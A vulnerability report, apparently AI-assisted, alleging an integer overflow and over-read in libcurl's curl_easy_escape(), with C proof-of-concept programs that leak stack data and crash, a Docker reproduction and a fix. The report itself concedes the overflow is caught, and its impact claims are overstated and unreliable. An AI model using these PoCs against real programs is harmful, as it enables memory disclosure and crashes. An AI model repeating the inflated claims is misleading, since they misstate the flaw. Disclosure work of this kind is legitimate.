{“lastseen”:”2025-12-25T17:31:12″,”description”:”## Disclaimer\\nBoth the confirmation, and reporting of this vulnerability used AI assistance. Nonetheless, I manually reviewed all of the reported results, including its reproduction steps and source code.\\n\\n## Summary\\n\\nThe `curl_easy_escape()` function in `lib\/escape.c` contains an integer overflow vulnerability when calculating the maximum buffer size for URL-encoded output. On 32-bit systems, when the input length exceeds approximately 715 MB, the calculation `length * 3 + 1` overflows. Additionally, the function trusts the caller-provided length parameter without validation, allowing attackers to read arbitrary memory past the input buffer, resulting in **information disclosure** (leaking sensitive stack data) or **denial of service** (crash via segmentation fault).\\n\\n## Affected Versions\\n\\n- **Current master branch** (tested at commit `7e064d0756`) – **VULNERABLE**\\n- Versions after commit `9bfc7f9234` (August 1, 2024) – **VULNERABLE**\\n- Versions before `9bfc7f9234` were protected by `CURL_MAX_INPUT_LENGTH` (8 MB limit)\\n\\n### Important Historical Context\\n\\nCommit `9bfc7f923479235b2fdf0e8fdd8468c0786a369b` (August 1, 2024) removed the `CURL_MAX_INPUT_LENGTH` protection:\\n\\n**Before (protected):**\\n“`c\\nCurl_dyn_init(\\u0026d, CURL_MAX_INPUT_LENGTH * 3); \/\/ Limited to 8MB * 3 = 24MB output\\n“`\\n\\n**After (vulnerable):**\\n“`c\\nCurl_dyn_init(\\u0026d, length * 3 + 1); \/\/ Uses user-controlled length – can overflow on 32-bit!\\n“`\\n\\nThis change was made to \\”allow users to URL encode larger chunks of data\\” but inadvertently reintroduced the integer overflow vulnerability on 32-bit systems.\\n\\n**Note:** The curl command-line tool may still be protected by other memory limits (dynbuf limits in file loading, address space constraints), but applications calling `curl_easy_escape()` directly via libcurl are vulnerable.\\n\\n—\\n\\n## Technical Analysis\\n\\n### Vulnerable Code\\n\\n**File**: [`lib\/escape.c`](https:\/\/github.com\/curl\/curl\/blob\/master\/lib\/escape.c)\\n\\nThe vulnerability exists in the `curl_easy_escape()` function at [lines 51-65](https:\/\/github.com\/curl\/curl\/blob\/master\/lib\/escape.c#L51-L65):\\n\\n“`c\\nchar *curl_easy_escape(CURL *data, const char *string, int inlength)\\n{\\n size_t length;\\n struct dynbuf d;\\n (void)data;\\n\\n if(!string || (inlength \\u003c 0))\\n return NULL;\\n\\n length = (inlength ? (size_t)inlength : strlen(string)); \/\/ Line 60\\n if(!length)\\n return curlx_strdup(\\”\\”);\\n\\n curlx_dyn_init(\\u0026d, length * 3 + 1); \/\/ Line 64 – VULNERABLE\\n\\n while(length–) { \/\/ Line 66 – Iterates ‘length’ times\\n unsigned char in = (unsigned char)*string++; \/\/ Reads from string pointer\\n \/\/ … URL encoding logic\\n }\\n}\\n“`\\n\\n### Root Cause Analysis\\n\\n**Two distinct vulnerabilities exist:**\\n\\n1. **Integer Overflow (Line 64)**: On 32-bit systems where `size_t` is 32 bits:\\n – When `length` \\u003e 715,827,882 bytes (~682 MB)\\n – The multiplication `length * 3` exceeds `UINT32_MAX` (4,294,967,295)\\n – The result wraps around due to integer overflow\\n – A much smaller value is passed to `curlx_dyn_init()`\\n\\n2. **Missing Buffer Bounds Validation (Line 66-67)**: The function trusts that the caller-provided `length` matches the actual buffer size. If an attacker passes a `length` larger than the actual input buffer, the `while(length–)` loop reads past the buffer into adjacent memory.\\n\\n### Overflow Boundary Analysis\\n\\n| Input Length | Expected Size (length \u00d7 3 + 1) | Actual 32-bit Result |\\n|————–|——————————–|———————-|\\n| 715,827,881 | 2,147,483,644 | 2,147,483,644 \u2713 |\\n| 715,827,882 | 2,147,483,647 | 2,147,483,647 \u2713 |\\n| **715,827,883** | 2,147,483,650 | **-2,147,483,646** \u26a0\ufe0f |\\n| 1,073,741,823 | 3,221,225,470 | -1,073,741,826 \u26a0\ufe0f |\\n| 2,147,483,647 (INT_MAX) | 6,442,450,942 | 2,147,483,646 \u26a0\ufe0f |\\n\\n—\\n\\n## Demonstrated Attacks\\n\\n### Attack 1: Stack Memory Disclosure (Information Leak)\\n\\nBy passing a `length` parameter larger than the actual input buffer, an attacker can force `curl_easy_escape()` to read and URL-encode arbitrary stack memory, including sensitive data like passwords, API keys, and session tokens.\\n\\n**Proof of Concept Source Code**\\n\\n“`c\\n\/*\\n * curl_easy_escape() Integer Overflow PoC – 32-bit\\n * Demonstrates STACK DATA LEAKAGE via integer overflow.\\n *\/\\n\\n#include \\u003cstdio.h\\u003e\\n#include \\u003cstdlib.h\\u003e\\n#include \\u003cstring.h\\u003e\\n#include \\u003cstdint.h\\u003e\\n#include \\u003climits.h\\u003e\\n#include \\u003ccurl\/curl.h\\u003e\\n\\nvoid hexdump(const char *desc, const void *data, size_t len) {\\n const unsigned char *p = (const unsigned char *)data;\\n size_t i, j;\\n \\n printf(\\”%s (%zu bytes):\\\\n\\”, desc, len);\\n for (i = 0; i \\u003c len; i += 16) {\\n printf(\\” %04zx: \\”, i);\\n for (j = 0; j \\u003c 16 \\u0026\\u0026 i + j \\u003c len; j++)\\n printf(\\”%02x \\”, p[i + j]);\\n for (; j \\u003c 16; j++)\\n printf(\\” \\”);\\n printf(\\” |\\”);\\n for (j = 0; j \\u003c 16 \\u0026\\u0026 i + j \\u003c len; j++)\\n printf(\\”%c\\”, (p[i + j] \\u003e= 32 \\u0026\\u0026 p[i + j] \\u003c 127) ? p[i + j] : ‘.’);\\n printf(\\”|\\\\n\\”);\\n }\\n}\\n\\nint main(void) {\\n printf(\\”curl_easy_escape() Integer Overflow – STACK LEAK PoC\\\\n\\”);\\n printf(\\”=====================================================\\\\n\\\\n\\”);\\n \\n printf(\\”Platform: %u-bit (sizeof(size_t) = %u)\\\\n\\”, \\n (unsigned)(sizeof(void*) * 8), (unsigned)sizeof(size_t));\\n printf(\\”UINT_MAX = %u (0x%x)\\\\n\\\\n\\”, UINT_MAX, UINT_MAX);\\n\\n \/* Put some secrets on the stack BEFORE our input buffer *\/\\n volatile char secret1[] = \\”SECRET_PASSWORD=hunter2\\”;\\n volatile char secret2[] = \\”API_KEY=sk-1234567890abcdef\\”;\\n volatile char cookie[] = \\”session=SENSITIVE_COOKIE_VALUE\\”;\\n \\n \/* Small input buffer *\/\\n char input[16];\\n memset(input, ‘X’, sizeof(input));\\n input[15] = ‘\\\\0’;\\n \\n printf(\\”Stack secrets placed before input buffer:\\\\n\\”);\\n printf(\\” secret1: \\\\\\”%s\\\\\\”\\\\n\\”, (char*)secret1);\\n printf(\\” secret2: \\\\\\”%s\\\\\\”\\\\n\\”, (char*)secret2); \\n printf(\\” cookie: \\\\\\”%s\\\\\\”\\\\n\\”, (char*)cookie);\\n printf(\\” input: \\\\\\”%s\\\\\\” (16 bytes at %p)\\\\n\\\\n\\”, input, (void*)input);\\n \\n printf(\\”Calling curl_easy_escape with length=200 on 16-byte buffer…\\\\n\\”);\\n printf(\\”This reads 184 bytes past our buffer into the stack!\\\\n\\\\n\\”);\\n \\n char *result = curl_easy_escape(NULL, input, 200);\\n \\n if (result) {\\n size_t len = strlen(result);\\n printf(\\”Got result: %zu bytes\\\\n\\”, len);\\n hexdump(\\”Leaked data (URL-encoded)\\”, result, len \\u003e 300 ? 300 : len);\\n \\n printf(\\”\\\\n=== Checking for leaked secrets ===\\\\n\\”);\\n if (strstr(result, \\”SECRET\\”) || strstr(result, \\”hunter\\”)) {\\n printf(\\”[!] LEAKED: secret1 data found!\\\\n\\”);\\n }\\n if (strstr(result, \\”API\\”) || strstr(result, \\”1234567890\\”)) {\\n printf(\\”[!] LEAKED: secret2 data found!\\\\n\\”);\\n }\\n if (strstr(result, \\”session\\”) || strstr(result, \\”SENSITIVE\\”)) {\\n printf(\\”[!] LEAKED: cookie data found!\\\\n\\”);\\n }\\n \\n curl_free(result);\\n } else {\\n printf(\\”Result: NULL\\\\n\\”);\\n }\\n \\n return 0;\\n}\\n“`\\n\\n**Proof of Concept Output:**\\n“`\\ncurl_easy_escape() Integer Overflow – STACK LEAK PoC\\n=====================================================\\n\\nPlatform: 32-bit (sizeof(size_t) = 4)\\nUINT_MAX = 4294967295 (0xffffffff)\\n\\nStack secrets placed before input buffer:\\n secret1: \\”SECRET_PASSWORD=hunter2\\”\\n secret2: \\”API_KEY=sk-1234567890abcdef\\”\\n cookie: \\”session=SENSITIVE_COOKIE_VALUE\\”\\n input: \\”XXXXXXXXXXXXXXX\\” (16 bytes at 0xffe91f05)\\n\\nCalling curl_easy_escape with length=200 on 16-byte buffer…\\nThis reads 184 bytes past our buffer into the stack!\\n\\nGot result: 410 bytes\\nLeaked data (URL-encoded) (300 bytes):\\n 0000: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 25 |XXXXXXXXXXXXXXX%|\\n 0010: 30 30 73 65 73 73 69 6f 6e 25 33 44 53 45 4e 53 |00session%3DSENS|\\n 0020: 49 54 49 56 45 5f 43 4f 4f 4b 49 45 5f 56 41 4c |ITIVE_COOKIE_VAL|\\n 0030: 55 45 25 30 30 41 50 49 5f 4b 45 59 25 33 44 73 |UE%00API_KEY%3Ds|\\n 0040: 6b 2d 31 32 33 34 35 36 37 38 39 30 61 62 63 64 |k-1234567890abcd|\\n 0050: 65 66 25 30 30 53 45 43 52 45 54 5f 50 41 53 53 |ef%00SECRET_PASS|\\n 0060: 57 4f 52 44 25 33 44 68 75 6e 74 65 72 32 25 30 |WORD%3Dhunter2%0|\\n\\n=== Checking for leaked secrets ===\\n[!] LEAKED: secret1 data found!\\n[!] LEAKED: secret2 data found!\\n[!] LEAKED: cookie data found!\\n“`\\n\\n**Leaked secrets visible in output:**\\n- `session=SENSITIVE_COOKIE_VALUE`\\n- `API_KEY=sk-1234567890abcdef`\\n- `SECRET_PASSWORD=hunter2`\\n\\n### Attack 2: Denial of Service (Crash)\\n\\nUsing `INT_MAX` as the length parameter causes the function to iterate billions of times, reading through the entire process memory until it hits an unmapped region and crashes.\\n\\n**Denial of Service PoC Source Code:**\\n\\n“`c\\n\/*\\n * curl_easy_escape() Integer Overflow – Denial of Service PoC\\n * Demonstrates crash via segmentation fault on 32-bit systems.\\n *\/\\n\\n#include \\u003cstdio.h\\u003e\\n#include \\u003cstdlib.h\\u003e\\n#include \\u003cstring.h\\u003e\\n#include \\u003climits.h\\u003e\\n#include \\u003ccurl\/curl.h\\u003e\\n\\nint main(void) {\\n printf(\\”curl_easy_escape() Denial of Service PoC\\\\n\\”);\\n printf(\\”=========================================\\\\n\\\\n\\”);\\n \\n printf(\\”Platform: %u-bit (sizeof(size_t) = %u)\\\\n\\”, \\n (unsigned)(sizeof(void*) * 8), (unsigned)sizeof(size_t));\\n printf(\\”INT_MAX = %d (0x%x)\\\\n\\\\n\\”, INT_MAX, INT_MAX);\\n \\n \/* Small input buffer *\/\\n char input[16] = \\”XXXXXXXXXXXXXXX\\”;\\n \\n printf(\\”Input buffer: \\\\\\”%s\\\\\\” (16 bytes at %p)\\\\n\\\\n\\”, input, (void*)input);\\n \\n printf(\\”Calling curl_easy_escape(NULL, input, INT_MAX)…\\\\n\\”);\\n printf(\\” Requested length: %d bytes\\\\n\\”, INT_MAX);\\n printf(\\” length * 3 + 1 = %lld (overflows on 32-bit!)\\\\n\\”, \\n (long long)INT_MAX * 3 + 1);\\n printf(\\” 32-bit result = %u\\\\n\\\\n\\”, (unsigned)((size_t)INT_MAX * 3 + 1));\\n \\n printf(\\”The function will iterate INT_MAX times, reading past our buffer\\\\n\\”);\\n printf(\\”through the entire stack until it hits unmapped memory…\\\\n\\\\n\\”);\\n fflush(stdout);\\n \\n \/* This will crash on 32-bit systems *\/\\n char *result = curl_easy_escape(NULL, input, INT_MAX);\\n \\n if (result) {\\n printf(\\”Result: %p (unexpected – should have crashed!)\\\\n\\”, (void*)result);\\n curl_free(result);\\n } else {\\n printf(\\”Result: NULL\\\\n\\”);\\n }\\n \\n printf(\\”If you see this message, the crash did not occur.\\\\n\\”);\\n \\n return 0;\\n}\\n“`\\n\\n**PoC Output:**\\n“`\\ncurl_easy_escape() Denial of Service PoC\\n=========================================\\n\\nPlatform: 32-bit (sizeof(size_t) = 4)\\nINT_MAX = 2147483647 (0x7fffffff)\\n\\nInput buffer: \\”XXXXXXXXXXXXXXX\\” (16 bytes at 0xfff6bb4c)\\n\\nCalling curl_easy_escape(NULL, input, INT_MAX)…\\n Requested length: 2147483647 bytes\\n length * 3 + 1 = 6442450942 (overflows on 32-bit!)\\n 32-bit result = 2147483646\\n\\nThe function will iterate INT_MAX times, reading past our buffer\\nthrough the entire stack until it hits unmapped memory…\\n\\nSegmentation fault (core dumped)\\n“`\\n\\n**GDB Analysis of Crash:**\\n“`\\nProgram received signal SIGSEGV, Segmentation fault.\\n0xf6c48560 in curl_easy_escape () from \/usr\/lib\/i386-linux-gnu\/libcurl.so.4\\n\\n#0 0xf6c48560 in curl_easy_escape () from \/usr\/lib\/i386-linux-gnu\/libcurl.so.4\\n#1 0x56b9b506 in main () at dos_poc.c:36\\n\\nRegisters at crash:\\n esi = 0xfff6d000 (end of stack – unmapped memory)\\n eip = 0xf6c48560 \\u003ccurl_easy_escape+144\\u003e\\n“`\\n\\nThe crash occurs when the string pointer (`esi`) advances past the end of the stack at `0xfff6d000` into unmapped memory.\\n\\n### Attack 3: Analysis of `length=0` (strlen) Path\\n\\nWhen `inlength=0` is passed to `curl_easy_escape()`, the function uses `strlen(string)` to determine the length. This section documents testing to determine if the integer overflow can be exploited via this code path.\\n\\n**Key code path:**\\n“`c\\nlength = (inlength ? (size_t)inlength : strlen(string)); \/\/ Line 60\\n\/\/ If inlength=0, strlen(string) is used\\ncurlx_dyn_init(\\u0026d, length * 3 + 1); \/\/ Line 64 – overflow calculation\\n“`\\n\\n#### Scenario 3a: Large String Causing Overflow (Safe – dynbuf catches)\\n\\n**Test:** Pass a string \\u003e 1.43 GB with `length=0` to trigger overflow via strlen.\\n\\n**PoC Source Code:**\\n“`c\\n\/*\\n * curl_easy_escape() Overflow via strlen() path\\n * Tests if overflow can be exploited when length=0\\n *\/\\n\\n#include \\u003cstdio.h\\u003e\\n#include \\u003cstdlib.h\\u003e\\n#include \\u003cstring.h\\u003e\\n#include \\u003cstdint.h\\u003e\\n#include \\u003ccurl\/curl.h\\u003e\\n\\nint main(void) {\\n printf(\\”curl_easy_escape() strlen() Path Test\\\\n\\”);\\n printf(\\”======================================\\\\n\\\\n\\”);\\n \\n printf(\\”Platform: %u-bit\\\\n\\”, (unsigned)(sizeof(void*) * 8));\\n \\n \/* Overflow threshold: (UINT32_MAX – 1) \/ 3 = 1,431,655,764 *\/\\n \/* First overflowing value: 1,431,655,765 *\/\\n size_t overflow_len = 1431655765;\\n \\n printf(\\”Allocating %zu bytes (%.2f GB)…\\\\n\\”, \\n overflow_len, overflow_len \/ (1024.0 * 1024.0 * 1024.0));\\n \\n char *huge = malloc(overflow_len + 1);\\n if (!huge) {\\n printf(\\”malloc failed – not enough memory\\\\n\\”);\\n return 1;\\n }\\n \\n memset(huge, ‘A’, overflow_len);\\n huge[overflow_len] = ‘\\\\0’;\\n \\n printf(\\”strlen() = %zu\\\\n\\”, strlen(huge));\\n printf(\\”Overflow: %zu * 3 + 1 = %u (32-bit)\\\\n\\\\n\\”, \\n overflow_len, (unsigned)(overflow_len * 3 + 1));\\n \\n printf(\\”Calling curl_easy_escape(NULL, huge, 0)…\\\\n\\”);\\n fflush(stdout);\\n \\n char *result = curl_easy_escape(NULL, huge, 0);\\n \\n printf(\\”Result: %s\\\\n\\”, result ? \\”non-NULL\\” : \\”NULL\\”);\\n if (result) curl_free(result);\\n free(huge);\\n \\n return 0;\\n}\\n“`\\n\\n**PoC Output:**\\n“`\\ncurl_easy_escape() strlen() Path Test\\n======================================\\n\\nPlatform: 32-bit\\nAllocating 1431655765 bytes (1.33 GB)…\\nstrlen() = 1431655765\\nOverflow: 1431655765 * 3 + 1 = 0 (32-bit)\\n\\nCalling curl_easy_escape(NULL, huge, 0)…\\nResult: NULL\\n“`\\n\\n**Analysis:** The overflow DOES occur (wraps to 0), but dynbuf’s safety checks catch it:\\n1. `curlx_dyn_init()` sets `toobig = 0`\\n2. First `curlx_dyn_addn()` call: `fit \\u003e toobig` (1 \\u003e 0) returns `CURLE_TOO_LARGE`\\n3. Function returns NULL safely\\n\\n#### Scenario 3b: Overflow to Small Positive Value (Safe – dynbuf catches)\\n\\n**Test:** Use a string length that overflows to ~1MB instead of 0.\\n\\n**Calculation:** For overflow to 1,000,000: length = (2^32 + 999,999) \/ 3 = 1,431,989,098\\n\\n**PoC Output:**\\n“`\\ncurl_easy_escape() strlen() Path Test v2\\n=========================================\\n\\nPlatform: 32-bit\\nAllocating 1431989098 bytes (1.33 GB)…\\nstrlen() = 1431989098\\nOverflow: 1431989098 * 3 + 1 = 999999 (32-bit)\\n\\ndynbuf toobig = 999999, but loop runs 1,431,989,098 times\\nCalling curl_easy_escape(NULL, huge, 0)…\\nResult: NULL\\n“`\\n\\n**Analysis:** Even when overflow produces a larger toobig value, dynbuf catches the overflow during writes when `fit \\u003e toobig`.\\n\\n#### Scenario 3c: Missing Null Terminator (Crash – but not overflow exploitation)\\n\\n**Test:** String without null terminator at page boundary causes strlen() to read into unmapped memory.\\n\\n**PoC Source Code:**\\n“`c\\n\/*\\n * curl_easy_escape() crash via strlen() – Page Boundary PoC\\n *\/\\n\\n#include \\u003cstdio.h\\u003e\\n#include \\u003cstdlib.h\\u003e\\n#include \\u003cstring.h\\u003e\\n#include \\u003csys\/mman.h\\u003e\\n#include \\u003cunistd.h\\u003e\\n#include \\u003ccurl\/curl.h\\u003e\\n\\nint main(void) {\\n printf(\\”curl_easy_escape() strlen() Page Boundary Crash\\\\n\\”);\\n printf(\\”================================================\\\\n\\\\n\\”);\\n \\n long page_size = sysconf(_SC_PAGESIZE);\\n \\n \/* Map 2 pages, unmap second to create guard *\/\\n void *mem = mmap(NULL, page_size * 2, PROT_READ | PROT_WRITE,\\n MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\\n munmap((char*)mem + page_size, page_size);\\n \\n \/* Fill first page, NO null terminator *\/\\n memset(mem, ‘A’, page_size);\\n \\n \/* String at end of page – strlen will cross into unmapped region *\/\\n char *danger = (char*)mem + page_size – 100;\\n memset(danger, ‘X’, 100); \/* No ‘\\\\0’ *\/\\n \\n printf(\\”Calling curl_easy_escape() – strlen() will SEGFAULT\\\\n\\”);\\n fflush(stdout);\\n \\n char *result = curl_easy_escape(NULL, danger, 0);\\n \\n printf(\\”Result: %p (unexpected)\\\\n\\”, (void*)result);\\n return 0;\\n}\\n“`\\n\\n**PoC Output:**\\n“`\\ncurl_easy_escape() strlen() Page Boundary Crash\\n================================================\\n\\nCalling curl_easy_escape() – strlen() will SEGFAULT\\n\\nProgram received signal SIGSEGV, Segmentation fault.\\n__strlen_sse2_bsf () at ..\/sysdeps\/i386\/i686\/multiarch\/strlen-sse2-bsf.S:86\\n#0 __strlen_sse2_bsf ()\\n#1 0xeb27d5c9 in curl_easy_escape () from \/usr\/lib\/i386-linux-gnu\/libcurl.so.4\\n#2 0x5b9fd4d9 in main () at attack3c_test.c:33\\n“`\\n\\n**Analysis:** This causes a crash, but it’s NOT exploiting the integer overflow – it’s exploiting a missing null terminator causing strlen() to read into unmapped memory. This is a contrived scenario.\\n\\n#### Conclusion: strlen() Path Analysis\\n\\n| Scenario | Overflow Triggered? | Exploitable? | Result |\\n|———-|———————|————–|——–|\\n| Large string (\\u003e1.43GB), length=0 | \u2705 Yes | \u274c No | NULL (dynbuf catches) |\\n| Overflow to small value | \u2705 Yes | \u274c No | NULL (dynbuf catches) |\\n| Missing null terminator | N\/A | \u26a0\ufe0f Contrived | SEGFAULT in strlen() |\\n\\n**Key Finding:** The integer overflow vulnerability **cannot be exploited** via the `length=0` (strlen) path because:\\n\\n1. **No buffer size mismatch:** When using strlen(), the length accurately reflects the actual string size – there’s no over-read of adjacent memory.\\n\\n2. **dynbuf safety catches overflow:** Even when the arithmetic overflow occurs, dynbuf’s `toobig` check prevents writing more data than the overflowed size allows, causing the function to return NULL safely.\\n\\n3. **Exploitation requires explicit length control:** The vulnerability is only exploitable when an attacker can pass a `length` parameter that is **larger than the actual buffer size**, creating the mismatch that enables out-of-bounds reads.\\n\\n—\\n\\n## Steps to Reproduce\\n\\n### Prerequisites\\n\\n- Docker installed in a x86_64 system\\n\\n### Step 1: Create the Test File\\n\\nCreate `vuln_app_32.c`:\\n\\n“`c\\n\/*\\n * curl_easy_escape() Integer Overflow PoC – 32-bit\\n * Demonstrates STACK DATA LEAKAGE via integer overflow.\\n *\/\\n\\n#include \\u003cstdio.h\\u003e\\n#include \\u003cstdlib.h\\u003e\\n#include \\u003cstring.h\\u003e\\n#include \\u003cstdint.h\\u003e\\n#include \\u003climits.h\\u003e\\n#include \\u003ccurl\/curl.h\\u003e\\n\\nvoid hexdump(const char *desc, const void *data, size_t len) {\\n const unsigned char *p = (const unsigned char *)data;\\n size_t i, j;\\n \\n printf(\\”%s (%zu bytes):\\\\n\\”, desc, len);\\n for (i = 0; i \\u003c len; i += 16) {\\n printf(\\” %04zx: \\”, i);\\n for (j = 0; j \\u003c 16 \\u0026\\u0026 i + j \\u003c len; j++)\\n printf(\\”%02x \\”, p[i + j]);\\n for (; j \\u003c 16; j++)\\n printf(\\” \\”);\\n printf(\\” |\\”);\\n for (j = 0; j \\u003c 16 \\u0026\\u0026 i + j \\u003c len; j++)\\n printf(\\”%c\\”, (p[i + j] \\u003e= 32 \\u0026\\u0026 p[i + j] \\u003c 127) ? p[i + j] : ‘.’);\\n printf(\\”|\\\\n\\”);\\n }\\n}\\n\\nint main(void) {\\n printf(\\”curl_easy_escape() Integer Overflow – STACK LEAK PoC\\\\n\\”);\\n printf(\\”=====================================================\\\\n\\\\n\\”);\\n \\n printf(\\”Platform: %u-bit (sizeof(size_t) = %u)\\\\n\\”, \\n (unsigned)(sizeof(void*) * 8), (unsigned)sizeof(size_t));\\n printf(\\”UINT_MAX = %u (0x%x)\\\\n\\\\n\\”, UINT_MAX, UINT_MAX);\\n\\n \/* Put some secrets on the stack BEFORE our input buffer *\/\\n volatile char secret1[] = \\”SECRET_PASSWORD=hunter2\\”;\\n volatile char secret2[] = \\”API_KEY=sk-1234567890abcdef\\”;\\n volatile char cookie[] = \\”session=SENSITIVE_COOKIE_VALUE\\”;\\n \\n \/* Small input buffer *\/\\n char input[16];\\n memset(input, ‘X’, sizeof(input));\\n input[15] = ‘\\\\0’;\\n \\n printf(\\”Stack secrets placed before input buffer:\\\\n\\”);\\n printf(\\” secret1: \\\\\\”%s\\\\\\”\\\\n\\”, (char*)secret1);\\n printf(\\” secret2: \\\\\\”%s\\\\\\”\\\\n\\”, (char*)secret2); \\n printf(\\” cookie: \\\\\\”%s\\\\\\”\\\\n\\”, (char*)cookie);\\n printf(\\” input: \\\\\\”%s\\\\\\” (16 bytes at %p)\\\\n\\\\n\\”, input, (void*)input);\\n \\n printf(\\”Calling curl_easy_escape with length=200 on 16-byte buffer…\\\\n\\”);\\n printf(\\”This reads 184 bytes past our buffer into the stack!\\\\n\\\\n\\”);\\n \\n char *result = curl_easy_escape(NULL, input, 200);\\n \\n if (result) {\\n size_t len = strlen(result);\\n printf(\\”Got result: %zu bytes\\\\n\\”, len);\\n hexdump(\\”Leaked data (URL-encoded)\\”, result, len \\u003e 300 ? 300 : len);\\n \\n printf(\\”\\\\n=== Checking for leaked secrets ===\\\\n\\”);\\n if (strstr(result, \\”SECRET\\”) || strstr(result, \\”hunter\\”)) {\\n printf(\\”[!] LEAKED: secret1 data found!\\\\n\\”);\\n }\\n if (strstr(result, \\”API\\”) || strstr(result, \\”1234567890\\”)) {\\n printf(\\”[!] LEAKED: secret2 data found!\\\\n\\”);\\n }\\n if (strstr(result, \\”session\\”) || strstr(result, \\”SENSITIVE\\”)) {\\n printf(\\”[!] LEAKED: cookie data found!\\\\n\\”);\\n }\\n \\n curl_free(result);\\n } else {\\n printf(\\”Result: NULL\\\\n\\”);\\n }\\n \\n return 0;\\n}\\n“`\\n\\n### Step 2: Create Docker Environment\\n\\nCreate `Dockerfile`:\\n\\n“`dockerfile\\nFROM i386\/debian:stable\\n\\nRUN apt-get update \\u0026\\u0026 \\\\\\n apt-get install -y \\\\\\n build-essential \\\\\\n libcurl4-openssl-dev \\\\\\n pkg-config \\\\\\n gdb \\\\\\n file \\\\\\n \\u0026\\u0026 rm -rf \/var\/lib\/apt\/lists\/*\\n\\nWORKDIR \/test\\nCOPY vuln_app_32.c .\\n\\n# Compile with debug symbols\\nRUN gcc -g -O0 -o vuln_app vuln_app_32.c $(pkg-config –cflags –libs libcurl) -Wall \\u0026\\u0026 \\\\\\n echo \\”=== Binary info ===\\” \\u0026\\u0026 \\\\\\n file vuln_app\\n\\nCMD [\\”.\/vuln_app\\”]\\n“`\\n\\n### Step 3: Build and Run\\n\\n“`bash\\n# Build the Docker image\\ndocker build -t curl-leak .\\n\\n# Run the test (shows stack leak, then crashes)\\ndocker run –rm curl-leak\\n\\n# For GDB debugging of the crash:\\ndocker run –rm curl-leak gdb -batch -ex ‘run’ -ex ‘bt’ -ex ‘info registers’ .\/vuln_app\\n“`\\n\\n### Expected Output\\n\\n“`\\ncurl_easy_escape() Integer Overflow – STACK LEAK PoC\\n=====================================================\\n\\nPlatform: 32-bit (sizeof(size_t) = 4)\\nUINT_MAX = 4294967295 (0xffffffff)\\n\\nStack secrets placed before input buffer:\\n secret1: \\”SECRET_PASSWORD=hunter2\\”\\n secret2: \\”API_KEY=sk-1234567890abcdef\\”\\n cookie: \\”session=SENSITIVE_COOKIE_VALUE\\”\\n input: \\”XXXXXXXXXXXXXXX\\” (16 bytes at 0xffe91f05)\\n\\nCalling curl_easy_escape with length=200 on 16-byte buffer…\\nThis reads 184 bytes past our buffer into the stack!\\n\\nGot result: 410 bytes\\nLeaked data (URL-encoded) (300 bytes):\\n 0000: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 25 |XXXXXXXXXXXXXXX%|\\n 0010: 30 30 73 65 73 73 69 6f 6e 25 33 44 53 45 4e 53 |00session%3DSENS|\\n 0020: 49 54 49 56 45 5f 43 4f 4f 4b 49 45 5f 56 41 4c |ITIVE_COOKIE_VAL|\\n 0030: 55 45 25 30 30 41 50 49 5f 4b 45 59 25 33 44 73 |UE%00API_KEY%3Ds|\\n 0040: 6b 2d 31 32 33 34 35 36 37 38 39 30 61 62 63 64 |k-1234567890abcd|\\n 0050: 65 66 25 30 30 53 45 43 52 45 54 5f 50 41 53 53 |ef%00SECRET_PASS|\\n 0060: 57 4f 52 44 25 33 44 68 75 6e 74 65 72 32 25 30 |WORD%3Dhunter2%0|\\n\\n=== Checking for leaked secrets ===\\n[!] LEAKED: secret1 data found!\\n[!] LEAKED: secret2 data found!\\n[!] LEAKED: cookie data found!\\n“`\\n\\n### Note\\nSimilar steps can be taken to reproduce all of the other attack scenarios mentioned in the **Demonstrated Attacks** section.\\n\\n—\\n\\n## Recommended Fix\\n\\nAdd explicit overflow and bounds checks before the vulnerable calculation in `lib\/escape.c`:\\n\\n“`c\\nchar *curl_easy_escape(CURL *data, const char *string, int inlength)\\n{\\n size_t length;\\n struct dynbuf d;\\n (void)data;\\n\\n if(!string || (inlength \\u003c 0))\\n return NULL;\\n\\n length = (inlength ? (size_t)inlength : strlen(string));\\n if(!length)\\n return curlx_strdup(\\”\\”);\\n\\n \/* Check for potential overflow in length * 3 + 1 calculation *\/\\n if(length \\u003e (SIZE_MAX – 1) \/ 3)\\n return NULL;\\n\\n curlx_dyn_init(\\u0026d, length * 3 + 1);\\n \/\/ … rest of function\\n}\\n“`\\n\\nThis check ensures that `length * 3 + 1` will never overflow regardless of platform word size.\\n\\n**Note**: The buffer over-read vulnerability (trusting caller-provided length) is a separate issue that may require documentation updates to warn developers about proper usage, as the function signature intentionally allows passing a length different from the string’s actual size.\\n\\n—\\n\\n## Attack Surface Analysis\\n\\n### curl Command-Line Tool\\n\\nThe curl binary has **three code paths** that call `curl_easy_escape()`:\\n\\n1. **`–data-urlencode` option** (`tool_getparam.c:675`)\\n2. **Variable expansion `{{var:url}}`** (`var.c:131`)\\n3. **URL filename encoding** (`tool_operhlp.c:130`)\\n\\nHowever, testing shows the curl binary is **protected by other limits**:\\n- `CURL_MAX_INPUT_LENGTH` (8 MB) is still enforced in the tool’s file loading (`file2memory`)\\n- 32-bit address space constraints cause allocation failures before overflow threshold\\n\\n**Result:** The curl command-line tool returns \\”out of memory\\” before reaching the vulnerable code path.\\n\\n### libcurl Library (Direct API Usage)\\n\\nApplications that call `curl_easy_escape()` directly are **fully vulnerable**:\\n\\n“`c\\n\/\/ Vulnerable application code\\nchar *user_data = get_untrusted_input();\\nint user_length = get_untrusted_length(); \/\/ Attacker controls this!\\n\\n\/\/ If user_length \\u003e 715,827,882 on 32-bit: INTEGER OVERFLOW + CRASH\/LEAK\\nchar *encoded = curl_easy_escape(NULL, user_data, user_length);\\n“`\\n\\n**Attack scenarios:**\\n- Web applications processing user-uploaded data for URL encoding\\n- IoT devices (often 32-bit) processing network data\\n- Any application that passes user-controlled length to `curl_easy_escape()`\\n\\n—\\n\\n## References\\n\\n- Vulnerable file: https:\/\/github.com\/curl\/curl\/blob\/master\/lib\/escape.c\\n- Dynbuf implementation: https:\/\/github.com\/curl\/curl\/blob\/master\/lib\/curlx\/dynbuf.c\\n- Similar fixed vulnerabilities in curl:\\n – Alt-Svc overflow: commit `c3857eca70e3bf293fff2fe0b3766cfcad1b1251`\\n – IMAP overflow: commit `c1e3a760ba082762041a999bc98f21ea295d7cf4`\\n – Connection cache overflow: commit `fbc4d59151dc4a56052f3a92da3682dc97b32148`\\n\\n—\\n\\n## Impact\\n\\n## Summary:\\nAffects 32-bit systems applications using libcurl’s curl_easy_escape function where a user controls the length argument.\\n\\nDemonstrated impacts include:\\n- **Information Disclosure**: Attacker can leak 